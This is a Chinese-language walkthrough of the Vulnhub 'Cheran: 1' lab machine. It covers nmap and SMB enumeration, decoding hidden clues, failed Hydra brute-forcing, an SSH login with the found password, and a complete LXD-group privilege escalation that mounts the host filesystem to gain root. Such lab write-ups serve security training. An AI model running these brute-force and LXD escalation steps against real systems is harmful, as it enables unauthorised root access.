首页 > 其他分享 >Vulnhub之Cheran EE靶机详细测试过程(需要特别注意靶机的网络模式)

Vulnhub之Cheran EE靶机详细测试过程(需要特别注意靶机的网络模式)

时间:2023-01-31 12:56:22浏览次数:55  
标签:cheran EE kali Cheran 29 192.168 56.201 靶机 root

Cheran EE

靶机信息

名称:Cheran: 1

地址:

https://www.vulnhub.com/entry/cheran-1,521/

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:92:75:55      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.201  08:00:27:7f:80:62      1      60  PCS Systemtechnik GmbH       

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192168.56.201

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.201 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 21:49 EST
Nmap scan report for 192.168.56.201
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 38201e427ad6a92a016258f3b637d841 (RSA)
|   256 e8c15a147ac60924b60ac005e48203d9 (ECDSA)
|_  256 91b9e9b9e7837a287148c4589b397ba1 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:7F:80:62 (Oracle VirtualBox virtual NIC)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
| smb2-time: 
|   date: 2023-01-31T02:49:55
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: ubuntu
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: ubuntu
|_  System time: 2023-01-31T08:19:55+05:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds

NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、139/445(SMB)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ smbclient -L 192.168.56.201                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            UBUNTU
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ enum4linux 192.168.56.201
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jan 30 21:51:29 2023

 =========================================( Target Information )=========================================
                                                                                                                              
Target ........... 192.168.56.201                                                                                             
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.201 )===========================
                                                                                                                              
                                                                                                                              
[+] Got domain/workgroup name: WORKGROUP                                                                                      
                                                                                                                              
                                                                                                                              
 ===============================( Nbtstat Information for 192.168.56.201 )===============================
                                                                                                                              
Looking up status of 192.168.56.201                                                                                           
        UBUNTU          <00> -         B <ACTIVE>  Workstation Service
        UBUNTU          <03> -         B <ACTIVE>  Messenger Service
        UBUNTU          <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.56.201 )==================================
                                                                                                                              
                                                                                                                              
[+] Server 192.168.56.201 allows sessions using username '', password ''                                                      
                                                                                                                              
                                                                                                                              
 ===============================( Getting domain SID for 192.168.56.201 )===============================
                                                                                                                              
Domain Name: WORKGROUP                                                                                                        
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                                                          
                                                                                                                              
                                                                                                                              
 ==================================( OS information on 192.168.56.201 )==================================
                                                                                                                              
                                                                                                                              
[E] Can't get OS info with smbclient                                                                                          
                                                                                                                              
                                                                                                                              
[+] Got OS info for 192.168.56.201 from srvinfo:                                                                              
        UBUNTU         Wk Sv PrQ Unx NT SNT ubuntu server (Samba, Ubuntu)                                                     
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ======================================( Users on 192.168.56.201 )======================================
                                                                                                                              
Use of uninitialized value $users in print at ./enum4linux.pl line 972.                                                       
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.56.201 )================================
                                                                                                                              
                                                                                                                              
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            UBUNTU

[+] Attempting to map shares on 192.168.56.201                                                                                
                                                                                                                              
//192.168.56.201/print$ Mapping: DENIED Listing: N/A Writing: N/A                                                             

[E] Can't understand response:                                                                                                
                                                                                                                              
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*                                                                                    
//192.168.56.201/IPC$   Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.56.201 )===========================
                                                                                                                              
                                                                                                                              

[+] Attaching to 192.168.56.201 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] UBUNTU
        [+] Builtin

[+] Password Info for Domain: UBUNTU

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:                                                                          
                                                                                                                              
                                                                                                                              
Password Complexity: Disabled                                                                                                 
Minimum Password Length: 5


 ======================================( Groups on 192.168.56.201 )======================================
                                                                                                                              
                                                                                                                              
[+] Getting builtin groups:                                                                                                   
                                                                                                                              
                                                                                                                              
[+]  Getting builtin group memberships:                                                                                       
                                                                                                                              
                                                                                                                              
[+]  Getting local groups:                                                                                                    
                                                                                                                              
                                                                                                                              
[+]  Getting local group memberships:                                                                                         
                                                                                                                              
                                                                                                                              
[+]  Getting domain groups:                                                                                                   
                                                                                                                              
                                                                                                                              
[+]  Getting domain group memberships:                                                                                        
                                                                                                                              
                                                                                                                              
 =================( Users on 192.168.56.201 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                              
                                                                                                                              
[I] Found new SID:                                                                                                            
S-1-22-1                                                                                                                      

[I] Found new SID:                                                                                                            
S-1-5-32                                                                                                                      

[I] Found new SID:                                                                                                            
S-1-5-32                                                                                                                      

[I] Found new SID:                                                                                                            
S-1-5-32                                                                                                                      

[I] Found new SID:                                                                                                            
S-1-5-32                                                                                                                      

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                                                   
                                                                                                                              
S-1-5-32-544 BUILTIN\Administrators (Local Group)                                                                             
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-865974611-604371542-2155208271 and logon username '', password ''                    
                                                                                                                              
S-1-5-21-865974611-604371542-2155208271-501 UBUNTU\nobody (Local User)                                                        
S-1-5-21-865974611-604371542-2155208271-513 UBUNTU\None (Domain Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                   
                                                                                                                              
S-1-22-1-1000 Unix User\cheran (Local User)                                                                                   
S-1-22-1-1001 Unix User\Rajasimha (Local User)

 ==============================( Getting printer info for 192.168.56.201 )==============================
                                                                                                                              
No printers returned.                                                                                                         


enum4linux complete on Mon Jan 30 21:51:40 2023

对SMB协议的信息收集可知用户名:

cheran

Rajasimha

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/robots.txt
/*
/users
/youtube

访问/users目录:

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/users/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /users</title>
 </head>
 <body>
<h1>Index of /users</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Rajasimha.html">Rajasimha.html</a></td><td align="right">2020-07-29 13:02  </td><td align="right">1.0K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="cheran.html">cheran.html</a></td><td align="right">2020-07-29 12:19  </td><td align="right">176 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.201 Port 80</address>
</body></html>

分别访问/users目录下的文件:

http://192.168.56.201/users/cheran.html

将该页面中的图片下载到Kali Linux本地。

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/users/Rajasimha.html
<!DOCTYPE html>
<html>
<head>
<title>Rajasimha</title>
</head>

<body>
Find me...
</body>

</html>





<!--

+++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.<+
+++++ ++[-> ----- ---<] >---- ---.< +++[- >---< ]>--- .<+++ +[->- ---<]
>---. ---.+ ++.-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ .<+++ +[->+
+++<] >++++ .+.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++
+++++ [->++ +++++ +<]>+ +++++ +++.< +++[- >+++< ]>+.< +++++ ++++[ ->---
----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++ [->-- -<]>- --.--
-.<++ +++++ +[->- ----- --<]> ----- .<+++ ++++[ ->+++ ++++< ]>+++ +.<++
+++[- >++++ +<]>+ ++++. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.---
-.<++ +[->- --<]> ----. <+++[ ->+++ <]>++ +.--- ----- .<+++ ++++[ ->---
----< ]>--- ---.. .<+++ ++[-> ----- <]>-- ----- -.--- .<

-->


该页面中有一段编码过的信息,将其解码,这是一种brainfuck编码:

用在线网站解码:

https://www.splitbrain.org/services/ook

解码后得到:

Congrats, 

This is the Username...

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ ls
Chera-Dynasty.jpg  nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ steghide extract -sf Chera-Dynasty.jpg 
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ stegseek Chera-Dynasty.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.48% (132.7 MB)           
[!] error: Could not find a valid passphrase.

至此已经知道可能的两个用户名,在尝试破解其密码之前,先做一下目录扫描:

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/youtube/youtube.html
<!DOCTYPE html>

<html>

<title>Youtube</title>

<body>

<h1>Shadow Phreak</h1>

<a href="http://www.youtube.com/c/ShadowPhreak">Visit Shadow Phreak Youtube Channel</a>


        <p>

                <ul>
                        <li> <a href="https://youtu.be/MvEGnf4CvMk">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/f897aE9V3BI">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/idyEEb7BDLw">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/N_MIArVvZpE">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/chSu9PcXNhI">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/hmWjRM9dViQ">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/jQqbhtw7Faw">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/YnTDqNcbib0">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/_V0QxKe5ufc">Please Subscribe</a> </li>

                        <li> <a href="https://youtu.be/VLCDnSQf4Vg">Please Subscribe</a> </li>
                </ul>

        </p>

</body>





<footer>

  <p> Author : Mr. S. Premkumar </p>

</footer>

</html>



<!-- U0dsa1pHVnVJRWx1Wm04PQ== -->


┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ echo 'U0dsa1pHVnVJRWx1Wm04PQ==' | base64 -d
SGlkZGVuIEluZm8=                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ echo 'U0dsa1pHVnVJRWx1Wm04PQ==' | base64 -d | base64 -d
Hidden Info          

Hidden Info不知道什么意思?先暂时放一放?

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/admin.php           
<!DOCTYPE html>
<html>
<body>

<?php
echo "The way you are going is wrong...";
?>

</body>
</html>

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ gobuster dir -u http://192.168.56.201 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.201
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/01/30 22:11:38 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.56.201/images/]
/index.html           (Status: 200) [Size: 21614]
/.html                (Status: 403) [Size: 279]
/users                (Status: 301) [Size: 316] [--> http://192.168.56.201/users/]
/admin.php            (Status: 200) [Size: 100]
/robots.txt           (Status: 200) [Size: 21]
/youtube              (Status: 301) [Size: 318] [--> http://192.168.56.201/youtube/]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101025 / 1102805 (99.84%)===============================================================
2023/01/30 22:13:36 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l Rajasimha -P /usr/share/wordlists/rockyou.txt smb://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:49:39
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.201:445/
[445][smb] Host: 192.168.56.201 Account: Rajasimha Error: Invalid account (Anonymous success)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 22:49:51
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l cheran -P /usr/share/wordlists/rockyou.txt smb://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:50:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.201:445/
[445][smb] Host: 192.168.56.201 Account: cheran Error: Invalid account (Anonymous success)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 22:50:13

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l Rajasimha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:15:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active
[STATUS] 117.00 tries/min, 351 tries in 00:03h, 14344050 to do in 2043:19h, 14 active
[STATUS] 102.29 tries/min, 716 tries in 00:07h, 14343685 to do in 2337:12h, 14 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l rajasimha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:30:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[STATUS] 113.67 tries/min, 341 tries in 00:03h, 14344061 to do in 2103:15h, 13 active
[STATUS] 95.14 tries/min, 666 tries in 00:07h, 14343736 to do in 2512:40h, 13 active
[STATUS] 96.33 tries/min, 1445 tries in 00:15h, 14342957 to do in 2481:29h, 13 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l cheran -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:47:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 124.67 tries/min, 374 tries in 00:03h, 14344026 to do in 1917:40h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343634 to do in 2184:38h, 15 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

一直没有破解成功密码。

看了其他人的做法,这是因为我将目标主机设为Host-only, 在/youtube目录下有若干链接,其中一个链接为密码:k4rur,而用户名是所猜测的用户名:Rajasimha.

┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ ssh [email protected]
The authenticity of host '192.168.56.201 (192.168.56.201)' can't be established.
ED25519 key fingerprint is SHA256:bIEC4Rwz61rgp7mqsqUIOiHq+JZ68ACsyG6CaAakEaU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.201' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan 31 09:28:00 IST 2023

  System load:  0.01              Processes:             96
  Usage of /:   27.1% of 9.78GB   Users logged in:       0
  Memory usage: 54%               IP address for enp0s3: 192.168.56.201
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.


Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$ id
uid=1001(Rajasimha) gid=1001(Rajasimha) groups=1001(Rajasimha)
Rajasimha@ubuntu:~$ 

Rajasimha@ubuntu:/tmp$ sudo -l
Matching Defaults entries for Rajasimha on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Rajasimha may run the following commands on ubuntu:
    (ALL, !root) /bin/bash

虽然可以执行/bin/bash命令提权,但是无法提权到root,可以提权到另一个用户cheran

Rajasimha@ubuntu:/tmp$ sudo -u cheran /bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

cheran@ubuntu:/tmp$ id
uid=1000(cheran) gid=1000(cheran) groups=1000(cheran),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),115(sambashare),116(lpadmin)
cheran@ubuntu:/tmp$ sudo -l
[sudo] password for cheran: 
Sorry, try again.
[sudo] password for cheran: 
Sorry, try again.
[sudo] password for cheran: 
sudo: 3 incorrect password attempts
cheran@ubuntu:/tmp$ cd /home/cheran/
cheran@ubuntu:/home/cheran$ ls -alh
total 28K
drwxr-xr-x 4 cheran cheran 4.0K Jul 29  2020 .
drwxr-xr-x 4 root   root   4.0K Jul 29  2020 ..
-rw-r--r-- 1 cheran cheran  220 Jul 29  2020 .bash_logout
-rw-r--r-- 1 cheran cheran 3.7K Jul 29  2020 .bashrc
drwx------ 2 cheran cheran 4.0K Jul 29  2020 .cache
drwx------ 3 cheran cheran 4.0K Jul 29  2020 .gnupg
-rw-r--r-- 1 cheran cheran  807 Jul 29  2020 .profile
-rw-r--r-- 1 cheran cheran    0 Jul 29  2020 .sudo_as_admin_successful
cheran@ubuntu:/home/cheran$ 
cheran@ubuntu:/home/cheran$ 

cheran是lxd的用户组成员,是否可以利用lxd进行提权

但是利用lxd提权的时候发现报错:

cheran@ubuntu:/tmp$ lxc image import ./alpine.tar.gz --alias myimage
Error: Unable to read the configuration file: open /home/Rajasimha/.config/lxc/config.yml: permission denied

非常奇怪的错误,其实前面在sudo 的时候需要加上-i选项即可解决该错误:

Rajasimha@ubuntu:/tmp$ sudo -i -u cheran /bin/bash
[sudo] password for Rajasimha: 
cheran@ubuntu:~$ cd /tmp
cheran@ubuntu:/tmp$ ls
alpine.tar.gz
alpine-v3.13-x86_64-20210218_0139.tar.gz
linpeas.sh
systemd-private-134633a4e12d40a984cc125c2c3816d4-apache2.service-Ui2U0g
systemd-private-134633a4e12d40a984cc125c2c3816d4-systemd-resolved.service-X2Iddq
systemd-private-134633a4e12d40a984cc125c2c3816d4-systemd-timesyncd.service-AM7InD
tmux-1001
cheran@ubuntu:/tmp$ lxc import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Error: unknown command "import" for "lxc"
Run 'lxc --help' for usage.
cheran@ubuntu:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04

Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
cheran@ubuntu:/tmp$ lxc image list 
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Jan 31, 2023 at 4:30am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
cheran@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
cheran@ubuntu:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
cheran@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
cheran@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
cheran@ubuntu:/tmp$ lxc start ignite
cheran@ubuntu:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 473M   
drwxr-xr-x   23 root     root        4.0K Jul 29  2020 .
drwxr-xr-x    1 root     root           8 Jan 31 04:32 ..
drwxr-xr-x    2 root     root        4.0K Jul 29  2020 bin
drwxr-xr-x    3 root     root        4.0K Jul 29  2020 boot
drwxr-xr-x   18 root     root        3.8K Jan 31 02:46 dev
drwxr-xr-x   98 root     root        4.0K Jan 31 02:47 etc
drwxr-xr-x    4 root     root        4.0K Jul 29  2020 home
lrwxrwxrwx    1 root     root          34 Jul 29  2020 initrd.img -> boot/initrd.img-4.15.0-112-generic
lrwxrwxrwx    1 root     root          34 Jul 29  2020 initrd.img.old -> boot/initrd.img-4.15.0-112-generic
drwxr-xr-x   22 root     root        4.0K Jul 29  2020 lib
drwxr-xr-x    2 root     root        4.0K Jul 29  2020 lib64
drwx------    2 root     root       16.0K Jul 29  2020 lost+found
drwxr-xr-x    2 root     root        4.0K Jul 29  2020 media
drwxr-xr-x    2 root     root        4.0K Jul 29  2020 mnt
drwxr-xr-x    2 root     root        4.0K Jul 29  2020 opt
dr-xr-xr-x  143 root     root           0 Jan 31 02:46 proc
drwx------    3 root     root        4.0K Jul 29  2020 root
drwxr-xr-x   27 root     root         940 Jan 31 04:31 run
drwxr-xr-x    2 root     root       12.0K Jul 29  2020 sbin
drwxr-xr-x    2 root     root        4.0K Jul 29  2020 snap
